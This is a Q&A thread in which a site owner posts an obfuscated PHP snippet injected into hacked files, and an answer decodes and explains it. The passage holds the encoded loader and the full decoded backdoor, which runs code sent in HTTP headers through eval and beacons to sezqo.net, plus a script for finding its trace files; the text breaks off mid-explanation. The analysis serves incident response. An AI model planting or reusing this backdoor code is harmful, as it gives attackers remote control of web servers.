php - My server was hacked a encoded code was injected. i was not able to know what was the purpose of this code ? Please anybody help me

Question

my php files were hacked and some one injected some encoded text in my files. Can any body help my to understand what this code is actually doing. i am not able to decode this.

here is that encoded code piece.

/*versio:3.01*/$II11=110426;if (!function_exists('I11lIl1I')){$GLOBALS['II11'] = '!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQMy4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8gSFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!xUVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEgYmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAS#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*XJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdE8yMG9RZnBWbGhaQXRCY2ZPSFhKOEZFVER3UktOU1FpVnFoWlpxYk11VmgwN3NqZUZDdkh1WjJZdnRnTk9oZmpCWm1ibnNuUDVaaHhIeERoYXN5aE8yZHFnYThaWnZvblRGYzl5YXBvdkpBWjJ0RXRESG1kcHdKN2pnaGVHNXppSmx6aWU0YlNJWTV0NGJSS25jVkF3WHVQMVdxUmptM0RESERld3U4QjJ6b0J0QS91VmFCUGtxWnN5SGtRc2k0emp1ZTM3L3J4RlRvNDlrSEk4NHBMWi9jMk5TVjVJUmRuRVlaN3hlTU1NbnU4WUtNc1ozK1VwcWF0b012R1Q4U2hPbUlHYUVnZGVBZ2ZIOHhJVGxYdEtPUTEzZVVMSHlBTmFBaFRGczJnQVQrTEF3Z0NKNTRGQ2c2NlNKSHNLUUNpSXNpMUxxVWxjME9KUTlGazVOa0d6ZURzSXM1U3pGQUpLSHpuZm5yZmJsRmhFK1NOUGFOVWk5T1RKalg2R1ZEeURKUVZyU29weUVaTnhQUGR0ZSs2RHR4TkZOVUFVcUJDSytkNGJJQ1habG9zSFFsYkVreXNtZTJZaHNDWkswRkJxVytUeWZuSGozeTREK05jaUgvQTkzS0hyaC9WY1R5OCtUUmN0RXEzZ2JYKzl1Wmd1N3hlejVlSmlkbmVGRWlybGh3VXUvZGxzZXJsY2VwK24vdjJ5UlFhbWVDdVdvQXlQZUxhV1ExV1k4U0JNc29MVnFCaHd0dG55UDRZU2hqQlhhaWdkdityc0txck9GSmFxckVFMEZ4VlorQXZyb3FxNmtZMlZCMGNuYWVGVjIvYUIwbGMyZGYzS2lzZmVrZWJJZmtlQTI5RjJoMFdnVzRiK04xMlNGNVdGVjJwaEdvcGY1SHE1dkcwN2xnMkU3L24zRlA1ZFp3VS9KM0I0VVM2OUNrWlpMMWhGdDllM2dYOW4wVGExOFBobHVyanovRm1EMGZ1QzVhY1hQNkdtejhHNGxCZjZ0TTZuUjJ5NW82WW1WeTh5eWNrSk1kNDBOVG10MlArUWpsbEZ3OEtvUWkvVnZIQTZJOUVvazBoblVXT0FEQzltZ2oxdmsyek5ERm82MTlJcTRkNHVSYWhTdDcvWkR4V294SnNHT1hsUDJIeDlqelBaamtPVVJIdUNkdlhPQkdHR2hZOFpvVjhEYWltbVJjL0ZHZmtxUVh2QXRYM2NRc2ZtdjFrdW5iUG5ab1VxeDhIZGRBR3ArYVpZRHloNmpMM3NKRzRKdS8wK0JLaG55Z0tDZEZlY3dabnFqcmtOZjM3RkdJNEF5THRheEttSk9IWkhEQUJacTNFaG9xYmRxRzdoSkJpYUQzcWFUQTVmSVVjdXFZZ2QwTjR6WmJMZkdPNUNqemlPQ3JsaVcyN0JjNTRCL2tKOG1vejAwTnVPaWVtTXNweXR3a2Rvc0FBYlpWVVFsUUwzM3lvLzZDeW8zR1lDWEpIWXFwVDFoK2d4d2dCcStLYkVIMm8rRG9aaXVGV0lmVkFYM2h4OVROY3JlR1VjSFF6MUVOUGJ4MWdqWWh6bUMreDd6ejZ6SlJzVGVqQ2ZIWVF0Wi9BQkkxWXRtNTB1U0hWTUdBME5oa3VWNC8wT3dpSEpBWGVEZFp5ekVGYVNQNGJxZlVCWkY0anBDaUFpQ0s2OG0ya1FtTlluYndGZzd5Kytnb1hiaThVRkhGVkIyOWoxRjNtKyttTVEybDZ6MyszaWNRUE5TOXQ4czIxYkVVemkwMTBhUDFjazczS3FLWlhIZFBuNWxqN3NVNllsYVRyN1VyK2hmNEpYZXhRbElPeWc5bko1MkFHNHJOWUJsdyttcHQ1SkFCamsxZkxuMC9aVUxROXRLVlFjNElaUTVReDRleld2QW9KVmo2M3UrNnJZajlTSVUwU3hTWWlqNVRaR1ZxNCtSZkNVeDN6MUkyRjdrdElaWENna2NVeCtnUDFmR2lYTGNTbXVqVVZoaXhaSnF1bUlZQS93OGtMa2VtclVpcWt2NmtWdmo3ckRCTlRidnFzUm9hbkd5eGFSZTVKdno5M0padDNYTmkwMTdCUStXZ29PRWY0QXoyRmxXek8zcVN5dHlybCtGeXZkVXRySGYvRytWQ25RRmJneVlKcGExem1VNkh3QVFEc0lFUGdxMTFWbTFmUG1jN3VDa2M0SUVSQ25veHc5YXNMc3phbHFRYmR4TzVFMUtDSlJjUnhiUGxBT2x6cWpoMTVXdXd1TVJkOVZialM1M2UyVVVBS2ZFT3ozS3RGU0gvU3hPOElSMGFwZ3Bvc2czelZsVlR6SDNKQUZBbHNaM0hBZ3VGZTRZNDdseXVVaFlmTDNxZEh0RGNSM3pON1UwT3REZFd1QXQvWWNHY0xUK2pDK1pKdmhKdVMvblNuQ2hWYkpQWEpkNFozb0h0QWgvSjFFY2w4OFdCTTFtNzJ1U0l3c0pyWE9UM2JZVVNqWk9CUExic0J0RHZ1WUdjbzJMTmU0ZjVtd2lIQnFLUi9WRDZrZGZvaWxybHkwcEtEY3NESGM3aEtXdDcyKzE0Z2h2N3pLNnNmczgyd1hQaHIxamdCZ0RKUGRtZ1ZaR3JJOVRxM2pkV0xoTXd1dFNlUlJlN25FKzFwNCttSUJxRWVzZHlZS1VIZldXeWRNdGI0RHB0UUNxVWh5SmNJRm05UUdYVzhnVnl4TDNhb1MxaHVKaFVZRFE1MHhGSTY5NzZpKzNaVWlzZ2ZGVWo2WFMvbTdyMWdVZ0dXMStwQWROd1ZWb3EvNk5EbU1UR3EzK2g4cWFYNkIiKSkpOwWn=&kcHJlZ19yZXBsYWNl';function I11lIl1I($a, $b){$c=$GLOBALS['II11']; $d=pack('H*','6261736536345f6465636f'.'6465'); return $d(substr($c, $a, $b));};$QO0000QQ0 = I11lIl1I(3374, 16);$QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");};

Answer 1

Short Answer

It announces itself to a bot network or worm, which has "http://sezqo.net/w3.php" as a message relay. This relay is most probably only a server hacked the same way. This "network" then may send a request back (maybe not immediately, but much later) containing the real code to be executed. This code may either replace your website (in all or only some special cases, the script is just executed in front of your code) and it may do anything else a PHP script can do.

The Decoded and Cleaned Up Script

if (!defined("determinator")) {
  if (function_exists("ini_set")) { 
    @ini_set("allow_url_fopen", 1);
    @ini_set("display_errors", 0);
  }

  function w3net_feof($f, &$time = NULL) {
    $time = microtime(true);
    return feof($f);
  }

  function w3net_getfile($host, $URI) {
    if (@ini_get("allow_url_fopen") == "1") {
      return @file_get_contents("http://" . $host . $URI. "&w=fgc");
    } elseif (function_exists("curl_init")){
      $ch = @curl_init();
      @curl_setopt($ch, CURLOPT_URL, "http://" . $host . $URI. "&w=cu");
      @curl_setopt($ch, CURLOPT_HEADER, false);
      @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 6);
      $curl_result = @curl_exec($ch);
      @curl_close($ch);
      if (empty($curl_result)) {
        $curl_result = "";
      }
      return $curl_result;
    } else {
      $f = @fsockopen($host, 80, $errno, $errstr, 5);
      if ($f) {
        $data = "";
        $time = NULL;
        @fputs($f, "GET {$URI}"."&w=sk HTTP/1.0"."
"."Host: "."{$host}
");
        $useragent = PHP_OS."/".PHP_VERSION;
        @fputs($f, "User-Agent: {$useragent}

");
        while(!w3net_feof($f, $time) && (microtime(true) - $time) < 2) {
          $data .= @fgets($f, 128);
        }
        @fclose($f);
        $parts = explode("

", $data);
        unset($parts[0]);
        return implode("

", $parts);
      }
    }
  }

  function w3net_output($key, $val) {
    echo "Y_".$key.":".$val."
";
  }

  function php_server($varname){
    return @$_SERVER[$varname];
  }

  $version1="ftp/201309";
  $version2="3.01";
  $host="http://";
  if (isset($_SERVER["HTTPS"])) {
    if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
  }
  $host.=strtolower(@$_SERVER["HTTP_HOST"]);

  foreach ($_GET as $key=>$val) {
    if (strpos($val,"union")) {
      $_GET[$key]="";
    } elseif (strpos($val,"select")) {
      $_GET[$key]="";
    }
  }

  if(!isset($_SERVER["REQUEST_URI"])) {
    $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
    if(isset($_SERVER["QUERY_STRING"])) {
      $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
    }
  }

  function get_temp_directory() {
    $result=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );

    foreach ($tmpdirs as $tmpdir){ 
      if (!empty($tmpdir)){
        $tmpdir.=DIRECTORY_SEPARATOR;
        if (@is_writable($tmpdir)) {
          $result = $tmpdir; break;
        }
      }
    }

    return $result;
  }

  if (strlen($host) < 10) {
    define("determinator", 0);

  } elseif ($requestURL=$host.@$_SERVER["REQUEST_URI"]) {
    $hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
    $w3n_code=get_temp_directory().".".$hash;
    define("determinator", $w3n_code);
    $IlIlII = $w3n_code.".log";
    if (@$_SERVER["HTTP_Y_AUTH"]==$hash) {
      echo "
";
      w3net_output("versio", $version2."-".$version1."-php");
      if ($code=base64_decode(@$_SERVER["HTTP_EXECPHP"])){
        @eval($code);
        echo "
";
        w3net_output("out", "ok");
      }
      exit(0);
    }
    $found = False;
    $ua = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
    foreach (explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex") as $pattern) {
      if (strpos($ua, $pattern)!==False) {
        $f = @fopen($w3n_code.".log", "a");
        $requestURI_encoded = @urlencode(@$_SERVER["REQUEST_URI"]);
        @fwrite($f, time()."".$pattern."".$requestURI_encoded."
");
        @fclose($f);
        $found=True;
        break;
      }
    }
    if (@is_file($w3n_code)) {
      @touch($w3n_code);
      @include_once($w3n_code);
    } elseif ($found === True) {
      if (@touch($w3n_code)) {
        $requestURL=@urlencode($requestURL);
        $URI = "/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2;
        $data = w3net_getfile("sezqo.net", $URI);
        @touch($w3n_code);
      }
    }
  } else {
    define("determinator", 1);
  }
}

What the script does (detailed explaination)

OK, what does it do? It first tries to unset some PHP security restrictions (enable "allow_url_fopen" and disable "display_errors"). Then it defines functions w3net_feof() (used by w3net_getfile()) and w3net_getfile($host, $URI). w3net_getfile is used to fetch the data from a URL. It tries different possibilities as file_get_contents (if allow_url_fopen is allowed), libcurl and a simple HTTP implementation via fsocket functions. It also defines a function w3net_output() which is used to output key/value pairs as result of the Request that starts this script. It defines a function php_server() to retrieve variables from $_SERVER, but is never used.

Having done this, it sets some version strings ($version1 and $version2, seems to be an identifier for the script itself). Then it constructs a variable that contains the $host part (including http:// or https://) of the URL that enables to reach your script. It then cleans the $_GET variable from values that contain "union" and "select" (sets the values to a empty string). I assume this is used to shorten the final URL. And -if not yet set - it sets the $_SERVER variable "REQUEST_URI" to $_SERVER["SCRIPT_NAME"]."?".$_SERVER["QUERY_STRING"].

As a next step, it defines a function that looks for a writeable directory, where it can place some downloads.

The next step is to check if $host ("https://" or "http://" is shorter than 10 characters. If this is the case, it stops any further action. This is only the case if the HTTP-Host-Name of the server is shorter than 3 characters. This might be some way to block this script from working on special setups where the hostname is very short (as in a development environment).

The next step is to try, if a $requestURL can be built by $host.@$_SERVER["REQUEST_URI"] and if so, it continues the following:

1. It constructs a Hash value $hash (using $hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");) which identifies the local System by Hostname, PHP-OS (version), the $version2 "3.01" part of the version string and some salt "QQ0OQ000000Q0OQ0Q".
2. It then checks, if the current Request has a header "HTTP_Y_AUTH" that equals this hash. If so, it returns some version info to the requesting client machine via w3net_output(). Then it looks for another HTTP header "HTTP_EXECPHP" which is directly executed as PHP code using eval(). After this, the script outputs a return/linefeed and "out" = "ok" via the w3net_output() mechanism. Then it stops the script via exit(0). This part allows a remote machine that knows the exact hash key to access this script and execute PHP code on your machine.
3. If the hash did not match (or no hash was sent), it checks if the "User Agent" matches some patterns (any string of google,yahoo,baidu,bingbot,msnbot,yandex). These are accesses by search engine crawlers. If so it logs this access into a log file which is named using $w3n_code.".log" where $w3n_code=get_temp_directory().".".$hash; (the hash directory found, the hash value appended and then ".log" appended). It writes one line, consisting of a unixtimestamp, the matched pattern (identifying the search engine) and the encoded requestURI (tab delimited). I assume this is used to log how many search engine traffic is to be expected for this location. If there is a lot of traffic there, the "site" is maybe sold or can be used to push the page rank of some websites by inserting some links to other sites. Also a variable $found is set to "true" that marks the traffic as "search engine crawler".
4. As a next step, it checks if a file $w3n_code exists, the filename is like the log file above, but without ".log" at its end. If so it runs the contained PHP code.
5. If this script did not exist yet, it checks if the current request was marked (by $found=true;) as search engine traffic. In that case the script announces itself to network, by a request to "http://sezqo.net/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2. This request contains the $requestURL (how to reach THIS script on your server), the Hash key (that allows to authenticate and to send the script another PHP script to execute) and a type 'php' aswell as the version strings $version1 and $version2. After this, it calls touch() to create an empty scriptfile named $w3n_code. So this request is sent only once, the first search engine comes by.

Further Debugging

Save the following script to your web page (same server) and execute it through the browser, using https:// and http://. It uses the part of the above script which generates the $hash and estimates the storage directory. It outputs the filenames of the script that the network inserted (if already) and of the logfile. In the same directory look for any other files with similar names (especially *.log files). The logfiles will give you information where the "worm" described above has intruded the system (there may be multiple locations). If file without ".log" already exists, the infected script was already announced to the network and might already have executed any code that was send trough the network. If it contains a script, this script is inserted / executed every time your websites script (containing the above code) is called...

NOTE: Not finding those files is not a guarantee, that nothing has happend! As the network might already have send a PHP-script that removed all those traces...

<?php

function get_temp_directory() {
    $result=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );

    foreach ($tmpdirs as $tmpdir){ 
      if (!empty($tmpdir)){
        $tmpdir.=DIRECTORY_SEPARATOR;
        if (@is_writable($tmpdir)) {
          $result = $tmpdir; break;
        }
      }
    }

    return $result;
}

$version1="ftp/201309";
$version2="3.01";
$host="http://";
if (isset($_SERVER["HTTPS"])) {
  if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
}
$host.=strtolower(@$_SERVER["HTTP_HOST"]);

$hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
$w3n_code=get_temp_directory().".".$hash;

echo "FILENAMES:<br>
";
echo $w3n_code."<br>
";
echo $w3n_code.".log<br>
";

?>

How I did extract the script

Ok, to know what it does, I decoded and analyzed your script. Here is how...

First we format it a bit more nicely:

    /*versio:3.01*/

    $II11=110426;

    if (!function_exists('I11lIl1I')){
      $GLOBALS['